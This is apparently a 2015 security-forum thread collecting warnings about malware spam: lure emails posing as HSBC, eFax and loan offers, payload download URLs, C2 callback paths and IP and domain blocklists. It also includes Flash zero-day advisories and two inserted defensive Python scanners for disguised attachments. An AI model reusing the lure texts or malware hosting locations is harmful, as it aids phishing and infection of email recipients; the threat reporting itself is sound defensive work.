"... Recommended blocklist:
38.65.142.12 "
___
Fake 'HSBC' SPAM - malware attached
- http://myonlinesecurity.co.uk/attn-hsbc-encrypted-3rd-party-payment-malware/
10 July 2015 - "'ATTN: HSBC ENCRYPTED 3RD PARTY PAYMENT' pretending to come from Payment Administrator <info@ hsbc .com.hk> with a zip attachment is another one from the current bot runs.. The email looks like:
Dear Sir/Madam,
The attached payment advice is issued at the request of our customer. This payment is encrypted for security reasons.
The advice is for your reference only. Confirm receipt of this email. In the case you have problems downloading the attachment do not hesitate to revert back to us.
See attached
Yours faithfully,
Global Payments and Cash Management
HSBC ...
10 July 2015: Attachment.rar Extracts to: Dedebot_crypted10806.scr
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/2225da6af21393aaaf887ea784bfb4b460ff93a98fc56d65e88300b209d987ea/analysis/1436528754/
___
Fake 'discounts' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/monthly-discounts-team-proprofs-word-doc-or-excel-xls-spreadsheet-malware/
10 July 2015 - "'Monthly discounts pretending to come from support@ proprofs .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Good Morning!
We would appreciate if you took a look at and gained insight into our discounts.
Here we attach the file with information on discounts.
Discounts are time limited.
Best regards, team proprofs.
10 July 2015: e-gift.doc - Current Virus total detections: 25/56*
... Which tries to download http ://gets-adobe .com/fid/ZmlsZToxMTA4NzQzLy8/nkernel.exe However I get nothing from the site from my UK IP number but a colleague in USA did manage to get the payload (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/333b0469ffe4abc0d4af02ef5057e869b8bc99ef1d1cf0ea4d03252e6f190423/analysis/1436543817/
** https://www.virustotal.com/en/file/44e6596510ae28b86ec7fbabf63db5f7b7b6865d77d229c36e7f101816ea9a9d/analysis/1436549421/
... Behavioural information
TCP connections
5.255.255.5: https://www.virustotal.com/en/ip-address/5.255.255.5/information/
204.45.251.183: https://www.virustotal.com/en/ip-address/204.45.251.183/information/
5.255.255.55: https://www.virustotal.com/en/ip-address/5.255.255.55/information/
gets-adobe .com: 109.234.38.103: https://www.virustotal.com/en/ip-address/109.234.38.103/information/
___
PC Shipments declined 9.5% in Q2 2015
- https://www.gartner.com/newsroom/id/3090817
July 9, 2015 - "Worldwide PC shipments totaled 68.4 million units in the second quarter of 2015, a 9.5 percent decline from the second quarter of 2014, according to preliminary results by Gartner, Inc. This was the steepest PC shipment decline since the third quarter of 2013. PC shipments are projected to decline 4.4 percent in 2015. There were many contributors to the decline of PC shipments in the second quarter of 2015, and Gartner analysts highlighted three of the major reasons for the drop in shipments. Analysts emphasized that these inhibitors are temporary events, and they are not changing the PC market's structure. Therefore, while the PC industry is going through a decline, the market is expected to go back to slow and steady growth in 2016..."
> http://www.businesswire.com/news/home/20150709006274/en/PC-Market-Continues-Decline-Windows-10-Release#.VZ-imZNVhBf
July 09, 2015
:fear::fear: :mad:
AplusWebMaster
2015-07-11, 22:14
FYI...
Another Hacking Team Flash 0day Uncovered...
- https://blog.malwarebytes.org/exploits-2/2015/07/new-hacking-team-flash-player-0day-uncovered/
Update: 07/11 9 AM PT As reported by Kafeine*, Angler EK is now using this zero-day...
* http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
... On a late Friday night, yet another zero-day targeting once again the Flash Player has been uncovered from this very same Hacking Team archive. Adobe released a security bulletin shortly after:
> https://helpx.adobe.com/security/products/flash-player/apsa15-04.html
July 10, 2015 - 'Summary: A critical vulnerability (CVE-2015-5122) has been identified in Adobe Flash Player 18.0.0.204 and earlier versions... Adobe is aware of reports** that an exploit targeting this vulnerability has been published publicly... Adobe expects to make updates available during the week of July 12, 2015... Adobe categorizes this as a critical vulnerability...'"
** https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html
> http://blog.trendmicro.com/trendlabs-security-intelligence/new-zero-day-vulnerability-cve-2015-5123-in-adobe-flash-emerges-from-hacking-team-leak/
July 11, 2015 - "... -two- Adobe Flash player zero-days disclosed in a row from the leaked data of Hacking Team, we discovered -another- Adobe Flash Player zero-day (assigned with CVE number, CVE-2015-5123)... we recommend users -disable- Adobe Flash Player for the meantime until the patch from Adobe becomes available..."
>> https://helpx.adobe.com/security/products/flash-player/apsa15-04.html
Updated: July 12, 2015 - "Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified... Adobe expects to make updates available during the week of July 12, 2015..."
Uninstall or Disable Plugins ...
> http://www.howtogeek.com/209156/uninstall-or-disable-your-browser-plug-ins-to-make-your-browser-more-secure/
:fear: :mad: :fear:
AplusWebMaster
2015-07-13, 19:30
FYI...
Fake 'Criminal prosecution' SPAM – PDF malware
- http://myonlinesecurity.co.uk/criminal-offence-prosecution-fake-pdf-malware/
13 July 2016 - "The latest email being sent by the criminal gangs trying to infect you with an Upatre downloader tries to convince you that you are being investigated by the police for a Criminal offence prosecution. Don’t open the attachment - it will infect you. The email looks like:
It has been detected that via Your e-mail account are being mailed materials including discriminatory propaganda.
Please note that mentioned actions are to be qualified as criminal offence forbidden by legislation.
Police will conduct according investigation as a result of which You to five years.
If You had not mailed mentioned materials as sson as possible execute enclosed declaration and forward the scan-copy
13 July 2015: statement_to_be_filed.zip : Extracts to: statement_to_be_executed.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/68ca0e495332654e4a019a9bf537103b9cb07a640c40ebbfb6ff98c817652669/analysis/1436803275/
:fear::fear: :mad:
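Several of the posts above (the 'reference', 'AMEX Safe Key', 'Invoice reminder' and 'Criminal prosecution' runs) describe the same lure: a zip that extracts to a .scr or .exe whose icon makes it pass for a PDF once Windows hides known extensions. The script below is an added example, not code from any of the quoted blogs, that inspects an in-memory zip attachment for that trick: it flags members with executable extensions, double extensions such as invoice.pdf.exe, and members whose bytes carry a PE header while the name claims a document. The archive names and the inert MZ/PE header stub it scans are constructed for the demonstration.

```python
"""Flag e-mail attachment archives that hide a Windows executable behind a
document-looking name (added example; sample archives are constructed)."""
import io
import struct
import zipfile

# Extensions Windows runs on double-click and hides by default.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs"}
# Extensions the lures in the thread pretend to be.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt"}


def _basename_parts(member_name: str) -> list:
    """Lower-cased file name (directories stripped) split on dots."""
    return member_name.lower().rsplit("/", 1)[-1].split(".")


def is_pe(data: bytes) -> bool:
    """True if data starts with a Windows PE image: 'MZ' header and an
    e_lfanew offset (at 0x3C) that points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def name_findings(member_name: str) -> list:
    """Findings derived from the member name alone."""
    findings = []
    parts = _basename_parts(member_name)
    if len(parts) < 2:
        return findings
    ext = "." + parts[-1]
    if ext in EXECUTABLE_EXTS:
        findings.append(f"{member_name}: executable extension {ext}")
        # invoice.pdf.exe style: a document extension just before the real one
        if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTS:
            findings.append(f"{member_name}: double extension disguised as .{parts[-2]}")
    return findings


def content_findings(member_name: str, head: bytes) -> list:
    """Findings from the first bytes of the member versus its claimed type."""
    parts = _basename_parts(member_name)
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if is_pe(head) and ext not in EXECUTABLE_EXTS:
        return [f"{member_name}: PE executable with non-executable extension {ext or '(none)'}"]
    return []


def check_zip_attachment(data: bytes) -> list:
    """Scan a zip attachment held in memory; return a list of finding strings
    (empty list means nothing suspicious was seen)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            findings += name_findings(info.filename)
            with zf.open(info) as fh:
                head = fh.read(4096)  # enough for the PE header check
            findings += content_findings(info.filename, head)
    return findings


def fake_pe_stub() -> bytes:
    """Constructed, inert bytes with a valid-looking MZ/PE header (no code)."""
    buf = bytearray(0x80)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)   # e_lfanew -> PE signature
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


def build_zip(members: dict) -> bytes:
    """Build an in-memory zip from {name: bytes} (constructed test input)."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return out.getvalue()


# Constructed lure modelled on the thread's "Personal Safe Key instruction.zip"
# extracting to a .scr; the payload is the inert header stub above.
LURE_ZIP = build_zip({"Personal Safe Key instruction.scr": fake_pe_stub()})
BENIGN_ZIP = build_zip({"quarterly-report.pdf": b"%PDF-1.4 constructed sample\n"})

if __name__ == "__main__":
    for label, blob in (("lure", LURE_ZIP), ("benign", BENIGN_ZIP)):
        print(label, check_zip_attachment(blob) or ["no findings"])
```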
AplusWebMaster
2015-07-14, 23:52
FYI...
IE 0-day added to mix...
- http://blog.trendmicro.com/trendlabs-security-intelligence/gifts-from-hacking-team-continue-ie-zero-day-added-to-mix/
July 14, 2015 - "... -another- vulnerability that could take over user systems has been found. Our latest discovery is in Internet Explorer, and has been acknowledged by Microsoft and patched as part of the regular Patch Tuesday cycle as MS15-065*. It has been designated as CVE-2015-2425. While we did find proof-of-concept (POC) code, there are still no known attacks exploiting this vulnerability..."
* https://technet.microsoft.com/library/security/MS15-065
July 14, 2015
> https://support.microsoft.com/en-us/kb/3065822
Last Review: 07/14/2015 - Rev: 1.0
Applies to:
Internet Explorer 11
Internet Explorer 10
Windows Internet Explorer 9
Windows Internet Explorer 8
Windows Internet Explorer 7
Microsoft Internet Explorer 6.0
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2425
Last revised: 07/14/2015
:fear::fear:
AplusWebMaster
2015-07-16, 17:05
FYI...
Fake 'Perfect job' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/perfect-achievement-perfect-job-great-work-word-doc-or-excel-xls-spreadsheet-malware/
16 July 2015 - "An email with subjects like 'Perfect achievement ! / Perfect job ! / Great work !' coming from random email addresses and names with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Congratulations ! You will take a 30% rake-off for the latest selling. Please overlook the attached documents to know the entire sum you’ve received.
Every day you demonstrate that you are the superior strength of our crew in the market. I am elate and appreciative to get such a capable and experienced subordinate. Keep up the good achievements.
With the best regards.
Michelle Silva General manager
-Or-
Congratulations ! You will receive a 30% commission for the previous disposition. Please check out the enclosed documents to find out the whole amount you’ve won.
Everyday you prove that you are the major force of our crew in the trading. I am sublime and appreciative to get such a capable and skilled workman. Continue the great job.
All the best.
Kathryn Brooks Company management
-Or-
Congratulations ! You will win a 40% commission for the latest realization. Please overlook the next documentation to get to know the whole amount you’ve won.
Everyday you demonstrate that you are the major strength of our team in the world of trade. I am sublime and appreciative to have such a capable and proficient subordinate. Proceed the good achievements.
All the best.
Sharon Silva General manager
-Or-
Congratulations ! You will gain a 45% rake-off for the last disposal. Please overlook the following documentation to know the whole amount you’ve won.
Everyday you convince that you are the best power of our team in the market. I am sublime and beholden to have such a clever and able sub. Continue the perfect job.
With best wishes.
Kathryn Pearson General manager
And others with similar wording... If you are unwise enough to try to open the word doc, you will see this message:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/07/total_sum_from_latest_disposition_doc.png
Do -not- follow their suggestions to enable editing or content, otherwise you will be infected...
25 February 2015: total_sum_from_latest_disposition.doc - Current Virus total detections: 4/55*
... This tries to connect to 2 web sites:
thereis.staging.nodeproduction .com/wp-content/uploads/78672738612836.txt
... which downloads an encrypted text file... and to
www .buildingwalls .co.za/wp-content/themes/corporate-10/papa.txt which gives the web address of http ://midwestlabradoodles .com/wp-content/themes/twentyeleven/qwop.exe. This file is an Upatre downloader for the typical Dyre banking malware (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https ://www.virustotal.com/en-gb/file/d58039e25fcfb0b2fd002e26ac55bb5cef7bf32c7a9063fb982f3b98bf83b463/analysis/1437049226/
** https://www.virustotal.com/en-gb/file/e2703de875caff775eddc4c970338b46daf5028d3923af38518f9c6a61fd4fbe/analysis/1437046046/
... Behavioural information
TCP connections
64.182.208.183: https://www.virustotal.com/en-gb/ip-address/64.182.208.183/information/
93.185.4.90: https://www.virustotal.com/en-gb/ip-address/93.185.4.90/information/
176.36.251.208: https://www.virustotal.com/en-gb/ip-address/176.36.251.208/information/
88.221.14.249: https://www.virustotal.com/en-gb/ip-address/88.221.14.249/information/
nodeproduction .com: 72.10.52.104: https://www.virustotal.com/en-gb/ip-address/72.10.52.104/information/
buildingwalls .co.za: 196.220.41.72: https://www.virustotal.com/en-gb/ip-address/196.220.41.72/information/
midwestlabradoodles .com: 72.167.131.160: https://www.virustotal.com/en-gb/ip-address/72.167.131.160/information/
- http://blog.dynamoo.com/2015/07/malware-spam-excelent-job-good.html
16 July 2015
"... Recommended blocklist:
93.185.4.90
thereis.staging.nodeproduction .com
www .buildingwalls .co.za
midwestlabradoodles .com "
___
Fake 'About your suggestions' SPAM – PDF malware
- http://myonlinesecurity.co.uk/about-your-suggestions-fake-pdf-malware/
16 July 2016 - "'About your suggestions' pretending to come from emaillambflan <emaillambflan@ totalnetwork .it> with a zip attachment is another one from the current bot runs... The email looks like:
We chatted few hours ago. We have thought about your programs how to perfect our work and financial profit. Your suggestions seem extremely inspiring and we undoubtedly want such a genius like you. We consider your plans are feasible and would like to implement them. Attached are our progression charts and processes directory. Please look through them and if you will have some questions ask about it. Also make a succinct plan thus we will confer about the elements of every step./r/n We are waiting for your reply soon !
16 July 2015: figures_and_guide.zip: Extracts to: figures_and_directory.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/8398dd57aeadd30b3bf047bef0e139a637541f7e265679b5be0f1acf861a6d91/analysis/1437056410/
... Behavioural information
TCP connections
104.238.136.31: https://www.virustotal.com/en-gb/ip-address/104.238.136.31/information/
93.185.4.90: https://www.virustotal.com/en-gb/ip-address/93.185.4.90/information/
109.86.226.85: https://www.virustotal.com/en-gb/ip-address/109.86.226.85/information/
23.14.92.65: https://www.virustotal.com/en-gb/ip-address/23.14.92.65/information/
___
Sales Commission Spam
- http://threattrack.tumblr.com/post/124241257458/sales-commission-spam
July 16, 2015 - "Subjects Seen
Good achievement !
Typical e-mail details:
Congratulations ! You will win a 43% commission for the last sale. Please see the next documents to get to know the whole sum you’ve obtained.
Daily you prove that you are the best power of our team in the world of commerce. I am proud and grateful to get such a gifted and experienced worker. Go on the excelent job.
With best wishes.
Kathryn Brooks Director
Screenshot: https://41.media.tumblr.com/e31f6795e8988a9dd9fa5c18e0485950/tumblr_inline_nrl2v2FoV21r6pupn_500.png
Malicious File Name and MD5:
amount_from_last_realization.scr (1e314705c1f154d7b848fcc20bfcd5e8)
Tagged: Sales Commission, Upatre
:fear::fear: :mad:
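Both tricks in the post above (a .scr with a PDF icon inside a zip, and a Word/Excel file whose macro has to be "enabled" to fire) can be caught at the mail gateway without any signature. The script below is an added example, not code from myonlinesecurity.co.uk, dynamoo.com or ThreatTrack: it reads the file content rather than trusting the icon or name, flags a PE header under any extension, looks for a VBA project inside Office documents, and opens one level of zip. The sample attachments are constructed in memory (a fake MZ/PE stub, a fake .docm with a vbaProject.bin part) and are not the real samples; the extension lists and the OLE2 string heuristic are assumptions about what is worth flagging.

```python
"""Triage e-mail attachments for the two tricks the posts above describe: an
executable hiding behind a PDF/Word icon (or a double extension) and an Office
document carrying a VBA macro. Added example, not code from myonlinesecurity.co.uk
or dynamoo.com; the samples are constructed in memory so it runs offline."""
import io
import zipfile

# Extensions Windows runs directly; these are what the "spoofed icon" .scr files use.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jse", ".vbs", ".wsf"}
OFFICE_EXTS = {".doc", ".docm", ".docx", ".dot", ".dotm", ".xls", ".xlsm", ".xlsx", ".rtf"}
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # legacy .doc/.xls compound file
ZIP_MAGIC = b"PK\x03\x04"                         # OOXML (.docm/.xlsm) and .zip


def ext_of(name):
    """Last extension, lower-cased, so 'invoice.pdf.scr' yields '.scr'."""
    base = name.rsplit("/", 1)[-1].lower()
    return base[base.rfind("."):] if "." in base else ""


def is_pe(data):
    """True for a Windows PE: 'MZ' stub and a 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(data[0x3C:0x40], "little")
    return data[pe_off:pe_off + 4] == b"PE\0\0"


def has_vba_macro(data):
    """OOXML: a vbaProject.bin part. OLE2: VBA storage names (stored UTF-16LE) anywhere
    in the file. The OLE check is a heuristic (assumption), not a full compound-file parse."""
    if data[:4] == ZIP_MAGIC:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
        except zipfile.BadZipFile:
            return False
    if data[:8] == OLE_MAGIC:
        return any(s.encode("utf-16-le") in data for s in ("_VBA_PROJECT", "Macros"))
    return False


def triage(filename, data, depth=0):
    """Return [(member_name, reason), ...]; an empty list means nothing suspicious.
    Zip containers are opened one level deep, as in the figures_and_guide.zip case."""
    findings = []
    ext = ext_of(filename)
    if is_pe(data):
        disguise = "" if ext in EXECUTABLE_EXTS else f" disguised as '{ext or 'no extension'}'"
        findings.append((filename, "PE executable" + disguise))
    elif ext in EXECUTABLE_EXTS:
        findings.append((filename, f"directly executable extension {ext}"))
    if ext in OFFICE_EXTS and has_vba_macro(data):
        findings.append((filename, "Office document with VBA macro"))
    if ext == ".zip" and data[:4] == ZIP_MAGIC and depth < 1:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                if not info.is_dir():
                    findings += triage(f"{filename}/{info.filename}", z.read(info), depth + 1)
    return findings


# ---- constructed samples (not real malware) --------------------------------
def fake_pe():
    """MZ stub with e_lfanew = 0x40 pointing at a PE signature; not a runnable program."""
    return b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 64


def fake_ooxml(with_macro):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b" constructed macro container")
    return buf.getvalue()


def fake_zip(member, data):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(member, data)
    return buf.getvalue()


SAMPLES = {
    "figures_and_guide.zip": fake_zip("figures_and_directory.scr", fake_pe()),
    "13409079779.docm": fake_ooxml(with_macro=True),
    "report.pdf": fake_pe(),            # PE named like a document: the icon-spoof case
    "minutes.docx": fake_ooxml(with_macro=False),
}


def triage_all(samples):
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLES).items():
        print(name, "->", findings or "clean")
```

The point of checking the MZ/PE header rather than the name is that "show known file extensions" only helps a user who looks; a gateway that trusts the .pdf name would pass `report.pdf` here. A clean .docx without a vbaProject.bin part is left alone, so the rule does not block ordinary documents.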
AplusWebMaster
2015-07-17, 16:25
FYI...
Fake 'eFax' SPAM - leads to malware
- http://blog.dynamoo.com/2015/07/malware-spam-efax-message-from-unknown.html
17 July 2015 - "This -fake- fax spam leads to malware:
Screenshot: https://2.bp.blogspot.com/-a9Ay1zeHZEw/VajqgaIj7iI/AAAAAAAAGx4/UwTCBaviLSw/s1600/fake-fax.png
Although the numbers and some other details change in the spam messages, in all cases the download location has been from a legitimate but -hacked- site at:
breedandco .com/fileshare/FAX-1400166434-707348006719-154.zip
The ZIP file has a detection rate of 6/55* and it contains a malicious executable named FAX-1400166434-707348006719-154.scr which has a detection rate of 4/55**. Automated analysis... shows a characteristic callback pattern that indicates Upatre (which always leads to the Dyre banking trojan):
93.185.4.90 :12325/ETK7//0/51-SP3/0/GKBIMBFDBEEE
93.185.4.90 :12325/ETK7//41/5/1/GKBIMBFDBEEE
This IP is allocated to C2NET in the Czech Republic. The malware also attempts to enumerate the IP address of the target by accessing checkip .dyndns .org which is a legitimate service. It is worth looking for traffic to that domain because it is a good indicator of compromise.
The malware reaches out to some other malicious IPs (mostly parts of a botnet):
93.185.4.90 (C2NET, Czech Republic)
62.204.250.26 (TTNET, Czech Republic)
76.84.81.120 (Time Warner Cable, US)
159.224.194.188 (Content Delivery Network Ltd, Ukraine)
178.222.250.35 (Telekom Srbija, Serbia)
181.189.152.131 (Navega.com, Guatemala)
194.28.190.84 (AgaNet Agata Goleniewska, Poland)
194.28.191.213 (AgaNet Agata Goleniewska, Poland)
199.255.132.202 (Computer Sales & Services Inc., US)
208.123.135.106 (Secom Inc, US)
Among other things, the malware drops a file XGwdKLWhYBDqWBb.exe [VT 10/55***] and vastuvut.exe [VT 6/55****].
Recommended blocklist:
93.185.4.90
62.204.250.26
76.84.81.120
159.224.194.188
178.222.250.35
181.189.152.131
194.28.190.84
194.28.191.213
199.255.132.202
208.123.135.106 "
* https://www.virustotal.com/en/file/41d2c42ac8371a14bf49c335c1b46af0993cfa2a0f210d757821808d085b9926/analysis/1437133169/
** https://www.virustotal.com/en/file/0ed3c094d49e3e9e3fa500bb937cb2543bf08d4efc8a915615545dcf1ba9d0a8/analysis/1437133178/
*** https://www.virustotal.com/en/file/af3417ac8f5770a4d7da4abfe1ab35fef72dbddb2672efc60491cf7b9a1b3941/analysis/1437135014/
**** https://www.virustotal.com/en/file/5d83962ff5e0b10050e535837c72ca97be8e748e6e0dd69b5951b2ef2e0f6d8a/analysis/1437135026/
___
Fake 'You've earned it' SPAM - malware
- http://blog.dynamoo.com/2015/07/malware-spam-youve-earned-it-youve.html
17 July 2015 - "This is another randomly-generated round of malware spam, following on from this one[1].
1] http://blog.dynamoo.com/2015/07/malware-spam-excelent-job-good.html
Date: 16 July 2015 at 12:53
Subject: Excelent job !
Congratulations ! You will obtain a 25% commission for the latest sale. Please overlook the next papers to know the whole sum you've gained.
Daily you prove that you are the main force of our branch in the sales. I am elate and beholden to have such a gifted and able employee. Proceed the good achievements.
All the best.
Michelle Curtis Company management
---------------------
Date: 16 July 2015 at 11:53
Subject: Good achievement !
Congratulations ! You will win a 40% rake-off for the latest sale. Please see the these documents to find out the entire sum you've won.
Everyday you assure that you are the head power of our group in the sales. I am sublime and beholden to get such a talented and skillful workman. Continue the good achievements.
With the best regards.
Sharon Silva Company management ...
Attached is a malicious Word document which in the two samples I saw was called
total_sum_from_last_sale.doc
total_sum_from_latest_disposition.doc
Both these documents were identical apart from the filename, and have a VirusTotal detection rate of 4/55*. Inside the document is this malicious macro... which according to Hybrid Analysis downloads several components (scripts and batch files) from:
thereis.staging .nodeproduction .com/wp-content/uploads/78672738612836.txt
www .buildingwalls .co.za/wp-content/themes/corporate-10/78672738612836.txt
www .buildingwalls .co.za/wp-content/themes/corporate-10/papa.txt
These are executed, then a malicious executable is downloaded from:
midwestlabradoodles .com/wp-content/themes/twentyeleven/qwop.exe
This has a VirusTotal detection rate of 8/55** and that report plus other automated analysis tools... phones home to the following malicious URLs:
93.185.4.90 :12317/LE2/<MACHINE_NAME>/0/51-SP3/0/MEBEFEBFEBEFJ
93.185.4.90 :12319/LE2/<MACHINE_NAME>/41/7/4/
That IP belongs to C2NET in the Czech Republic. It also sends non-malicious traffic to icanhazip.com (a legitimate site that returns the IP address) which is a good indicator of compromise.
This malware drops the Dyre banking trojan.
Recommended blocklist:
93.185.4.90
thereis .staging.nodeproduction .com
www .buildingwalls .co.za
midwestlabradoodles .com
* https://www.virustotal.com/en/file/d58039e25fcfb0b2fd002e26ac55bb5cef7bf32c7a9063fb982f3b98bf83b463/analysis/1437053265/
** https://www.virustotal.com/en/file/e2703de875caff775eddc4c970338b46daf5028d3923af38518f9c6a61fd4fbe/analysis/1437054039/
:fear::fear: :mad:
AplusWebMaster
2015-07-27, 14:59
FYI...
Fake 'copy' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/copy-word-doc-or-excel-xls-spreadsheet-malware/
27 July 2015 - "An email with a subject simply saying 'copy' pretending to come from belinda.taylor@ bssgroup .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email body simply says: copy
27 July 2015 : 13409079779.docm - Current Virus total detections: 4/56*
Downloads Dridex banking malware from:
terrasses-de-santeny .com/yffd/yfj.exe . Other versions of this downloader will download the -same- Dridex banking malware from alternative locations. So far we have seen
http ://www.madagascar-gambas .com/yffd/yfj.exe
http ://technibaie .net/yffd/yfj.exe
http ://terrasses-de-santeny .com/yffd/yfj.exe
http ://blog.storesplaisance .com/yffd/yfj.exe
http ://telechargement.storesplaisance .com/yffd/yfj.exe
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/fdf8b9d41404ba4121abf1fab7793cce1edf85f35abc4fa787040f87ccebfdc2/analysis/1437987707/
terrasses-de-santeny .com: 94.23.55.169: https://www.virustotal.com/en/ip-address/94.23.55.169/information/
madagascar-gambas .com: 'Could not find an IP address for this domain name' (May have been taken-down)
technibaie .net: 94.23.1.145: https://www.virustotal.com/en/ip-address/94.23.1.145/information/
storesplaisance .com: 94.23.1.145: FR / 16276 (OVH SAS)
___
Fake 'Order Confirmation' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/07/malware-spam-order-confirmation-ret.html
27 July 2015 - "This spam does not come from Royal Canin, but is instead a simple -forgery- with a malicious attachment:
From "[1NAV PROD RCS] " [donotreply@ royal-canin .fr]
Date Mon, 27 Jul 2015 18:49:16 +0700
Subject Order Confirmation RET-396716 Your Ref.: JL0815/1333 230715
Please find attached your Sales Order Confirmation
Note: This e-mail was sent from a notification only e-mail address that
cannot accept incoming e-mail. PLEASE DO NOT REPLY TO THIS MESSAGE.
Attached to the message is a file Order Confirmation RET-396716 230715.xml (it wasn't attached properly in the samples I saw) with a VirusTotal detection rate of 1/55*, which in turn contains a malicious macro... which downloads an executable from one of the following locations (there are probably more):
http ://www.madagascar-gambas .com/yffd/yfj.exe
http ://technibaie .net/yffd/yfj.exe
http ://blog.storesplaisance .com/yffd/yfj.exe
This is saved as %TEMP%\ihhadnic.exe, and has a detection rate of 2/55**. Automated analysis tools... show that it attempts to phone home to:
93.171.132.5 (PE Kartashev Anton Evgen'evich, Ukraine)..."
* https://www.virustotal.com/en/file/80042e9c1d0a7c40128506a7d56e32a0fab4ac149181dbbd2f28b959c263ea3e/analysis/1437999231/
** https://www.virustotal.com/en/file/c5bbeeecd49bf044049aca55ea691295692590b8fe4c461c1114aa055b6384ad/analysis/1437999249/
> http://myonlinesecurity.co.uk/order-confirmation-ret-396716-your-ref-jl08151333-230715-royal-canin-word-doc-or-excel-xls-spreadsheet-malware/
27 July 2015: Order Confirmation RET-396716 230715.xml - Current Virus total detections: 1/56*
... Which downloads an updated version of Dridex banking malware..."
* https://www.virustotal.com/en/file/80042e9c1d0a7c40128506a7d56e32a0fab4ac149181dbbd2f28b959c263ea3e/analysis/1437997926/
___
Fake 'Loan service' – PDF malware
- http://myonlinesecurity.co.uk/new-loan-service-nearby-fake-pdf-malware/
27 July 2015 - "'New Loan service nearby' with a zip attachment is another one from the current bot runs... Alternative subjects for this malspam run include: 'New Credit service near you'. The email looks like:
We are happy to inform you that we are founding a affiliate in your vicinity next week. We are credit services firm with more than 15 years practice , and several branches in the region. We give help to individuals and corporations in profiting money for the objective. We provide all the acts , consisting of bringing the money source that sets the lowest percentage and the best conditions of pays , all the paperwork , and etc.
We are enclosing the invite ticket for the opening celebration and service’s accommodation schedule. Wish to see you on our opening.
Give us a chance to maintain you!
Thanks,
Truly yours,
Mike Ward General management Info
-Or-
We are happy to announce you that we are opening a branch in your area soon. We are loan accommodations firm with more than 25 years workmanship, and several offices in the region.
We provide help to ordinary people and corporations in availing money for the objective.
We ensure all the actions, consisting of bringing the fiscal source that offers the lowest commissions and the best terms of payment, all the papers, and so on.
We are applying the engagement card for the opening and organization’s accommodation schedule. Hope to see you on that day.
Give us a chance to serve you!
Thanking you,
Yours truly,
Mike Ward General management Superior
And the usual other variety of computer bot generated wording that doesn’t quite read as proper English.
27 July 2015: invitation_and_accommodations.zip: Extracts to: call_and_accommodations.scr
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8f76dd3e022ecc7d946393d6838b659f29d988d6a24c547c8f2b33e14508e7fd/analysis/1438000007/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
93.185.4.90: https://www.virustotal.com/en/ip-address/93.185.4.90/information/
173.248.31.6: https://www.virustotal.com/en/ip-address/173.248.31.6/information/
2.18.213.48: https://www.virustotal.com/en/ip-address/2.18.213.48/information/
:fear::fear: :mad:
